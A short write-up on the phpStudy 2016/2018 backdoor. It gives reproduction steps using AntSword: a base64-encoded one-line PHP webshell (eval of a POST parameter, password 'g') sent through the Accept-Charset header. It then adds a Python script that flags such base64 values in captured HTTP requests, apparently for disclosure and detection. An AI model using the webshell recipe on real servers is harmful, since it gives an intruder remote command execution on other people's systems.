0x01 Description
phpStudy is an integrated PHP debugging environment package. It bundles the latest Apache, PHP, phpMyAdmin, ZendOptimizer and other software into a one-time installation that works out of the box with no configuration. Because it is free and convenient, it has nearly a million users domestically among PHP learners and developers.
Backdoor name: phpStudy backdoor
Threat level: Severe
Affected versions: phpStudy 2016, phpStudy 2018
Backdoor type: C&C, command execution
Difficulty of use: easy
0x02 Reproduction
Tool used: China Ant Sword (AntSword)
phpStudy: 2016, PHP-5.4.45
Accept-Encoding: gzip, deflate
Accept-Charset: the command to execute, base64-encoded
One-line webshell: ZXZhbCgkX1BPU1RbZ10pOw==
Password: g
Configure the HTTP request headers.
Connection succeeded.
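
The reproduction above carries the command in the Accept-Charset header as base64, which a legitimate charset list never looks like. As an added example (not part of the original write-up), this Python sketch flags such requests in captured traffic; the request records, field names and addresses are constructed for illustration, and the base64 heuristic is an assumption rather than a vendor signature.

```python
import base64

def decode_suspicious_charset(value):
    """Return decoded text if value is base64 for printable ASCII, else None."""
    candidate = "".join(value.split())  # drop whitespace added by proxies or logs
    # Real charset lists ("utf-8, iso-8859-1;q=0.5", "*") contain '-', ',', ';'
    # or are too short, so strict base64 validation rejects them.
    if len(candidate) < 8 or len(candidate) % 4 != 0:
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text.isprintable() else None

def scan_requests(requests):
    """Return one finding per request whose Accept-Charset carries base64 text."""
    findings = []
    for req in requests:
        # Header names are case-insensitive, so normalise before lookup.
        headers = {k.lower(): v for k, v in req["headers"].items()}
        decoded = decode_suspicious_charset(headers.get("accept-charset", ""))
        if decoded is not None:
            findings.append({"src": req["src"], "path": req["path"],
                             "accept_encoding": headers.get("accept-encoding"),
                             "decoded": decoded})
    return findings

# Constructed sample capture: two ordinary requests and one carrying the
# base64 value shown on this page (addresses are documentation ranges).
SAMPLE_REQUESTS = [
    {"src": "192.0.2.10", "path": "/index.php",
     "headers": {"Accept-Encoding": "gzip, deflate",
                 "Accept-Charset": "utf-8, iso-8859-1;q=0.5"}},
    {"src": "192.0.2.11", "path": "/index.php",
     "headers": {"Accept-Encoding": "gzip, deflate"}},
    {"src": "198.51.100.7", "path": "/index.php",
     "headers": {"accept-encoding": "gzip, deflate",
                 "accept-charset": "ZXZhbCgkX1BPU1RbZ10pOw=="}},
]

if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f['src']} {f['path']} Accept-Charset decodes to: {f['decoded']!r}")
```

Short charset names that happen to be valid base64 are filtered by the length and printable-ASCII checks, so treat a hit as a lead to investigate on a host running an affected phpStudy version rather than as proof of compromise.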